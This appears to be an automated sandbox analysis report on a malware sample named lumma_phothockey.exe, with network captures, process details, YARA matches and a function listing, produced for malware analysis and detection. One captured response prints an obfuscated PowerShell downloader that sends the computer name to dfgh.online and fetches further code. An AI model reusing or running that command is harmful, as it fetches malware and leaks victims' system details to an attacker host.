2025-01-14 16:02:32 UTC	1122	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:02:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vnlsm61mab2038r7mjs4bu70vf; expires=Sat, 10 May 2025 09:49:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UUtaDo1HafuScCoa575duYgIloOmi0ivSWt%2B78n8Sg3kS9Q1dci8gG%2F8ASFc4Yxjik9Bv2BHK0FYnrRTFDQ0qUhIo6MkwmIjaj8fwrMeOtB2r8TWtPbJPWrOGAyT%2BFbNoAHM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901ed9d7f89c0fa5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2070&min_rtt=2066&rtt_var=784&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1016&delivery_rate=1387173&cwnd=190&unsent_bytes=0&cid=b624aa5a2bac679d&ts=524&x=0"
2025-01-14 16:02:32 UTC	218	IN	Data Raw: 64 34 0d 0a 41 51 69 55 44 69 33 77 35 67 6c 34 4c 47 6e 44 76 75 69 68 73 51 67 36 72 7a 53 49 4c 2f 59 38 70 38 31 32 50 6d 4d 72 30 41 46 61 63 37 5a 37 44 38 72 45 59 51 78 59 47 62 43 45 74 49 37 74 4a 31 6e 4b 55 2f 30 42 68 56 54 49 76 53 6f 52 57 78 37 6e 4e 54 4d 2b 70 6a 6f 5a 78 72 6f 6d 43 45 52 48 74 38 61 63 67 35 30 71 58 4e 73 57 73 68 33 61 48 73 4c 76 54 41 38 65 42 36 73 6a 64 43 71 75 4c 45 57 45 6b 6e 6b 4c 46 6a 58 73 34 73 66 4b 33 57 46 4b 79 46 76 6d 57 70 34 53 31 4b 55 5a 54 6a 38 45 75 57 39 31 56 2f 64 69 58 61 2b 56 59 52 6b 43 48 62 76 4b 79 6f 32 54 62 6b 36 4e 44 72 67 44 31 46 6d 46 39 30 5a 44 50 67 3d 3d 0d 0a Data Ascii: d4AQiUDi3w5gl4LGnDvuihsQg6rzSIL/Y8p812PmMr0AFac7Z7D8rEYQxYGbCEtI7tJ1nKU/0BhVTIvSoRWx7nNTM+pjoZxromCERHt8acg50qXNsWsh3aHsLvTA8eB6sjdCquLEWEknkLFjXs4sfK3WFKyFvmWp4S1KUZTj8EuW91V/diXa+VYRkCHbvKyo2Tbk6NDrgD1FmF90ZDPg==
2025-01-14 16:02:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	59984	185.161.251.21	443	5392	C:\Users\user\Desktop\lumma_phothockey.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:02:33 UTC	201	OUT	GET /8574262446/ph.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: cegu.shop
2025-01-14 16:02:34 UTC	249	IN	HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Tue, 14 Jan 2025 16:02:34 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 329 Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT Connection: close ETag: "676c9e2a-149" Accept-Ranges: bytes
2025-01-14 16:02:34 UTC	329	IN	Data Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.

Target ID:	0
Start time:	11:01:56
Start date:	14/01/2025
Path:	C:\Users\user\Desktop\lumma_phothockey.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\lumma_phothockey.exe"
Imagebase:	0xc20000
File size:	210'432 bytes
MD5 hash:	78BD1DFF11C56A3138F78FF061C34D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1565730061.0000000004550000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1578700374.0000000007370000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1565730061.00000000042D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1552607329.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:22:18
Start date:	14/01/2025
Path:	C:\Users\user\Desktop\lumma_phothockey.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\lumma_phothockey.exe"
Imagebase:	0x10000
File size:	210'432 bytes
MD5 hash:	78BD1DFF11C56A3138F78FF061C34D5A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.7%
Total number of Nodes:	407
Total number of Limit Nodes:	28

Executed Functions

Function 072812C0 Relevance: 16.1, Strings: 12, Instructions: 1108COMMON

Download Yara Rule

Strings

$q, xrefs: 07281BA1
$q, xrefs: 07281553
$q, xrefs: 07281BEA
,q, xrefs: 07281D7A
$q, xrefs: 072817C7
$q, xrefs: 07281B91
4, xrefs: 07281C95
$q, xrefs: 07281707
$q, xrefs: 07281BFA
$q, xrefs: 07281717
$q, xrefs: 072817B7
$q, xrefs: 07281543

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: ,q$4$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q
API String ID: 0-2072453518
Opcode ID: b27368594e140874ea49602b7e4541ba0635bddef8a4e7bfee7fc392c1e770d8
Instruction ID: b2873724772055acd2afcb08c08d2369bed75ad843a2133f98ad9eba430eb6e9
Opcode Fuzzy Hash: b27368594e140874ea49602b7e4541ba0635bddef8a4e7bfee7fc392c1e770d8
Instruction Fuzzy Hash: B2B227B4A11219CFDB54DFA4D894BADB7B6BF48300F148199E905AB3E5CB71AC82CF50

Function 072815E7 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

$q, xrefs: 07281BEA
,q, xrefs: 07281D7A
$q, xrefs: 07281B91
4, xrefs: 07281C95
$q, xrefs: 07281707
$q, xrefs: 072817B7

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: ,q$4$$q$$q$$q$$q
API String ID: 0-3956183810
Opcode ID: cb5428a56edac87b334c61167abd225ede1af7d470b831afb949007158c7625c
Instruction ID: 521d67d39ecb3213f15bbe9ffd356cf676517382accd5a9b2cc317b02d4d592f
Opcode Fuzzy Hash: cb5428a56edac87b334c61167abd225ede1af7d470b831afb949007158c7625c
Instruction Fuzzy Hash: BC222AB4A11219CFDB64DFA4D894BA9B7B2FF48300F148199D509AB3E5DB31AD82CF50

Function 02DBED10 Relevance: 6.0, Strings: 4, Instructions: 956
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Teq, xrefs: 02DBF433
pq, xrefs: 02DBF8CA
xbq, xrefs: 02DBEE3D
TJq, xrefs: 02DBEEB2

Memory Dump Source

Source File: 00000000.00000002.1551993373.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2db0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: TJq$Teq$pq$xbq
API String ID: 0-2466396065
Opcode ID: 4a09c7ce45ab1eec9e3d10bda302956f55254c1781c3a3bb43b616955abe5b68
Instruction ID: cb4d9be42670b265807ee7644be394c5b261b00de10a74a0f49e4fe361f5e46c
Opcode Fuzzy Hash: 4a09c7ce45ab1eec9e3d10bda302956f55254c1781c3a3bb43b616955abe5b68
Instruction Fuzzy Hash: 85A2A575A00228CFDB65CF69C994AD9BBB2FF89304F1581D9E509AB325DB319E81CF40

Function 072A0040 Relevance: 3.8, Strings: 2, Instructions: 1335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2, xrefs: 072A101E
$q, xrefs: 072A06A2

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: 2$$q
API String ID: 0-2017333547
Opcode ID: fc40af9e00779d94e4dc337b7ef80d3122522c07dffc2bec707370c72172b810
Instruction ID: 1526e78bc4262491dcd07d00644a58df37f2b3e55c29474625c1333583db6207
Opcode Fuzzy Hash: fc40af9e00779d94e4dc337b7ef80d3122522c07dffc2bec707370c72172b810
Instruction Fuzzy Hash: 02E2B274A106288FDB64DF68D894BDEBBB2FB89301F1081E9D509A7354DB74AE81CF41

Function 064DB628 Relevance: 3.1, Strings: 2, Instructions: 607
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fq, xrefs: 064DB72F
8, xrefs: 064DB71C

Memory Dump Source

Source File: 00000000.00000002.1575565489.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64d0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: fq$8
API String ID: 0-1651916650
Opcode ID: 7ba75b3a0ea02c0e2bf1a6007f2f6e8d1582c4d3e8b2d4025dd896ee0183fa5e
Instruction ID: 2ea8cebbb20f5343234e2338180514bbd300ca1084db03cc6f8ca61b5bfd51d0
Opcode Fuzzy Hash: 7ba75b3a0ea02c0e2bf1a6007f2f6e8d1582c4d3e8b2d4025dd896ee0183fa5e
Instruction Fuzzy Hash: 7C52C675E006298FDBA4DF69CC94AD9B7B2FF99300F1081AAD509A7354DB306E85CF90

Function 064DB618 Relevance: 2.7, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fq, xrefs: 064DB72F
h, xrefs: 064DB710

Memory Dump Source

Source File: 00000000.00000002.1575565489.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64d0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: fq$h
API String ID: 0-152923806
Opcode ID: b820530806a308488d18febafdfb39874a2e9432edd98398a2e29d962fea6a97
Instruction ID: 6a3a92ac8957c761fe0520aef842ee3b8d1eae8019c23fa4dcba9187ba13f2ae
Opcode Fuzzy Hash: b820530806a308488d18febafdfb39874a2e9432edd98398a2e29d962fea6a97
Instruction Fuzzy Hash: 4071E875E006289BDB64DF69DC54BD9B7B2FF89300F1081AAD50DA7250DB306E85CF91

Function 06621190 Relevance: 2.3, Strings: 1, Instructions: 1004COMMON

Download Yara Rule

Strings

(q, xrefs: 06621768

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: e75d8d4bc7f71f87e5d732d0167ba0037d57bbabe40565854a8a26e1eba243ab
Instruction ID: a956ceb4331e9dbe6a2d061b1c331d06e1d3041559b2862ac001f463bdb989ac
Opcode Fuzzy Hash: e75d8d4bc7f71f87e5d732d0167ba0037d57bbabe40565854a8a26e1eba243ab
Instruction Fuzzy Hash: 9C82BE70B08A168FCB55CF68C49466EFBF2BF89300F248569D65AD7391CB34A842CF85

Function 0724D098 Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

Teq, xrefs: 0724D3CF

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 3b03480efa5ddfb360c3e01a3936972f342c7ae8192d0e857e5c2e89e1f801af
Instruction ID: 7e81b06dc9b1f3812d14b1c20419544baff7771dd4a058b5f8b8cd40408393e2
Opcode Fuzzy Hash: 3b03480efa5ddfb360c3e01a3936972f342c7ae8192d0e857e5c2e89e1f801af
Instruction Fuzzy Hash: 940216B4E24219CFDB68CF69D848BADB7B2FB8A300F1080AAD50DA7254DB745D81CF41

Function 06572668 Relevance: 1.6, APIs: 1, Instructions: 99nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 065726DE

Memory Dump Source

Source File: 00000000.00000002.1575940301.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6570000_lumma_phothockey.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 10e4121903b8d32ac391ee177c55047517394cc8567885aa24066a808850e922
Instruction ID: 90b80928bee5797cb630663c2506849343b514e6a46b19aa0f699c0757452e06
Opcode Fuzzy Hash: 10e4121903b8d32ac391ee177c55047517394cc8567885aa24066a808850e922
Instruction Fuzzy Hash: A8311BB4D0020A9FDB54DFAAE844AAEFBF5FB48310F10842AD419B7254DB395A41CFA5

Function 064DEC62 Relevance: 1.6, APIs: 1, Instructions: 69nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 064DECF1

Memory Dump Source

Source File: 00000000.00000002.1575565489.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64d0000_lumma_phothockey.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 9322dec2ea6f140f776130e8bea129ed76b4e317a3c92284fda5c1026e4c9f26
Instruction ID: 653ae9c72146f4870df2d703e21a3c550292e9ffe8fae296fcfca0b50b9911e9
Opcode Fuzzy Hash: 9322dec2ea6f140f776130e8bea129ed76b4e317a3c92284fda5c1026e4c9f26
Instruction Fuzzy Hash: 8B2126B5D01309AFCB10DFAAD881ADEFBF5FF48310F50842AE819A7250C7759900CBA1

Function 06626B47 Relevance: 1.6, Strings: 1, Instructions: 316COMMON

Download Yara Rule

Strings

PHq, xrefs: 06626EF1

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: PHq
API String ID: 0-3820536768
Opcode ID: e3bef05cb727ad5a172eb81d4301aa6bc350b3abeec4f48ff8238d17cd9af77c
Instruction ID: 3e61122c556da066b7e5b37753cc4ebb427043b1d99235b5c6b34f8819cc0450
Opcode Fuzzy Hash: e3bef05cb727ad5a172eb81d4301aa6bc350b3abeec4f48ff8238d17cd9af77c
Instruction Fuzzy Hash: 10E10574E04669CFEB64CF69D884B9EBBB2FB89304F1480AAD409AB240DB755985CF41

Function 064DEC68 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 064DECF1

Memory Dump Source

Source File: 00000000.00000002.1575565489.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64d0000_lumma_phothockey.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 7aaec8050ca8f0809fa3f4f58b18e364b150d5a3d453eea5430321214b3c2261
Instruction ID: 6bda467065a51106ffec911f387fea73267bd6ed7b8f4c3f68304129ed832bda
Opcode Fuzzy Hash: 7aaec8050ca8f0809fa3f4f58b18e364b150d5a3d453eea5430321214b3c2261
Instruction Fuzzy Hash: 7E2103B1D013499FDB10DFAAD980ADEFBF5FF48310F60842AE919A7250C7759900CBA0

Function 06626B58 Relevance: 1.6, Strings: 1, Instructions: 306COMMON

Download Yara Rule

Strings

PHq, xrefs: 06626EF1

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: PHq
API String ID: 0-3820536768
Opcode ID: 387cf0b8b72b02421b4360e2bc43b8b1a433ab5528fb157e2f99bf525725cb27
Instruction ID: e7f1ec7b565ae911250197569038b20d4cbbed1ef9aaea893bcc82913c3bdbb4
Opcode Fuzzy Hash: 387cf0b8b72b02421b4360e2bc43b8b1a433ab5528fb157e2f99bf525725cb27
Instruction Fuzzy Hash: C5D1E474E04629CFEB64DF69D884BAEBBF2FB89304F1090A9D409A7380DB755985CF41

Function 06572670 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 065726DE

Memory Dump Source

Source File: 00000000.00000002.1575940301.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6570000_lumma_phothockey.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4b39aec9ea791ed02e817b1ffb5704d849836dfd9663a2326b25d0dfdd97129a
Instruction ID: 0ff2628d5409ea5016b73bc6bf5aac88faa2a565ea71da53ecf313461de99fb9
Opcode Fuzzy Hash: 4b39aec9ea791ed02e817b1ffb5704d849836dfd9663a2326b25d0dfdd97129a
Instruction Fuzzy Hash: 3E1106B1D003098FDB20DFAAC444B9EFBF4FB48210F50842AD419A7240CB795905CFA4

Function 0724AED8 Relevance: 1.5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

Teq, xrefs: 0724B041

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 2fd2f832a88fc47688c2352f80d7fa453e658d459fb6ac84264b2177230fd5eb
Instruction ID: a17380bedc3cc148737e692476e37892fdd3c7597a730259bd7db56e367f71b6
Opcode Fuzzy Hash: 2fd2f832a88fc47688c2352f80d7fa453e658d459fb6ac84264b2177230fd5eb
Instruction Fuzzy Hash: 2CA107F4E25219CFDB18CFA9D888BADBBF6FB89300F10906AD409A7251D7759985CF40

Function 072A19A3 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc614b05909ef4fb84bea6aaa57105c02fb3dc41c40e72589d70cf390fd6d53f
Instruction ID: 4e35fe23c46ea40b761eddf9d8499276e6b5f335b583268a0d75ebf77dd10e71
Opcode Fuzzy Hash: dc614b05909ef4fb84bea6aaa57105c02fb3dc41c40e72589d70cf390fd6d53f
Instruction Fuzzy Hash: 9B52A5B4A146288FCB64DF28C984BAEBBB6FB49311F1081D9D50DA7355DB30AE81CF51

Function 064D65C1 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1575565489.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64d0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e643efc9a1a4438cbb23c736952f823a765fd6830a02f65c49712c2356146983
Instruction ID: 9c877fd2b472199efe1b4e2312043d951e78c2c0892e7eaf30c7f94802519687
Opcode Fuzzy Hash: e643efc9a1a4438cbb23c736952f823a765fd6830a02f65c49712c2356146983
Instruction Fuzzy Hash: 3CC1F470E05218CFEB94DF69D994B9EBBB2FB89304F1090AAD409A7354DB745D86CF40

Function 064D65D0 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1575565489.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64d0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f132a4c7db13a292d61de7e476ebbe69056149ac0499301b0ba320904848559
Instruction ID: 0eacc9b9e33915e98cef4f9c2fd21aba3d47e241f1aae8c8831e4bcb341d104d
Opcode Fuzzy Hash: 4f132a4c7db13a292d61de7e476ebbe69056149ac0499301b0ba320904848559
Instruction Fuzzy Hash: 40C10470E06218CFEB94DF69D994BAEBBB2FB89300F1090AAD409A7354DB745D85CF40

Function 072A3D32 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a832c30a1cb393cd044b5419ccb2a4f12b039692e72d1ea2b7316ac7bf8114ab
Instruction ID: 9cb9f76cdf0aa174c47af6bba706eff003291d1904af5b25ca81f6b1e93c1041
Opcode Fuzzy Hash: a832c30a1cb393cd044b5419ccb2a4f12b039692e72d1ea2b7316ac7bf8114ab
Instruction Fuzzy Hash: E091FEB5E25609DFDB04CFA9C5493EDBBF1FB8A304F2080AAD40AA7241D7B94A45CF54

Function 0662ABA8 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc619ac91f705651cee329edc6f0f948be1cf97eb7f2b472e3ab255f1ff447d0
Instruction ID: 003c5ee91016c61f172401d880ab3da1a6b7cb7b5c4b6a17f2206aad0084fc61
Opcode Fuzzy Hash: fc619ac91f705651cee329edc6f0f948be1cf97eb7f2b472e3ab255f1ff447d0
Instruction Fuzzy Hash: 9581F374E04629CFDB54DFA8D8887EEBBB2FB89304F10506AD509A7391DBB45886CF44

Function 0662ABB8 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2388e22821c84878148baa24366a037a7ce0aecb685f34744a592f1ac2edfc3e
Instruction ID: 25e8df224476b0e1a2e9fc07c57f395e1044e71a9443461f97a75e3d4b19ebda
Opcode Fuzzy Hash: 2388e22821c84878148baa24366a037a7ce0aecb685f34744a592f1ac2edfc3e
Instruction Fuzzy Hash: 5B810374E04629CFEB54DFA8D4887AEBBB2FB89304F10506AD109A7391DBB45D86CF44

Function 072A001F Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1b3e12f0f2dd360d54090120061f2876abb0c96546e860220e19a6a622113f3
Instruction ID: fe6525b37445033285aa4051261b16255ae1887700c91c7c45fc33224ee20abe
Opcode Fuzzy Hash: d1b3e12f0f2dd360d54090120061f2876abb0c96546e860220e19a6a622113f3
Instruction Fuzzy Hash: 9B510CB1E10A589BD718CF6BDC4469AFBF3AFC9300F14C0AAC448AB254EB741985CF41

Function 07287470 Relevance: 4.2, Strings: 3, Instructions: 481
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 07287945
Hq, xrefs: 07287974
Hq, xrefs: 072879C4

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: Hq$Hq$Hq
API String ID: 0-2505839570
Opcode ID: 837b0bd8b159fb541cc037f3ae492d6f111eea1420fe12f6b456758e1290e88b
Instruction ID: 96b50fa4b5bfb3704eae53426da6bdc07753f992c2dea15c0a7472616031ac59
Opcode Fuzzy Hash: 837b0bd8b159fb541cc037f3ae492d6f111eea1420fe12f6b456758e1290e88b
Instruction Fuzzy Hash: 59126CB0A112059FCB64EFA5D484A6EB7F2FF88300F24856DD5069B7A0DB35EC46CB91

Function 0728D6F1 Relevance: 4.1, Strings: 3, Instructions: 377
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 0728D881
(q, xrefs: 0728D855
(q, xrefs: 0728D829

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: (q$(q$Hq
API String ID: 0-2914423630
Opcode ID: d1cdcc2ad5db9010db0a4e35b7b6b829530faab4286fbb197cd43cf6a0193731
Instruction ID: 58c0bd173fe0dd8ea4828c590b78dc94c01ef030d64686a38f3e7d8943b974a8
Opcode Fuzzy Hash: d1cdcc2ad5db9010db0a4e35b7b6b829530faab4286fbb197cd43cf6a0193731
Instruction Fuzzy Hash: 37F18274B11209DFCB44EFA4D49499DBBB2FF88300F548559E902AB3A5DB31EC46CB91

Function 07289128 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 07289342
4'q, xrefs: 07289421
4'q, xrefs: 072894A1

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q
API String ID: 0-3126650252
Opcode ID: 28469254bdbc743a9b3c6a2f7332c1de93f3f02c047ded5e994ed801198ea295
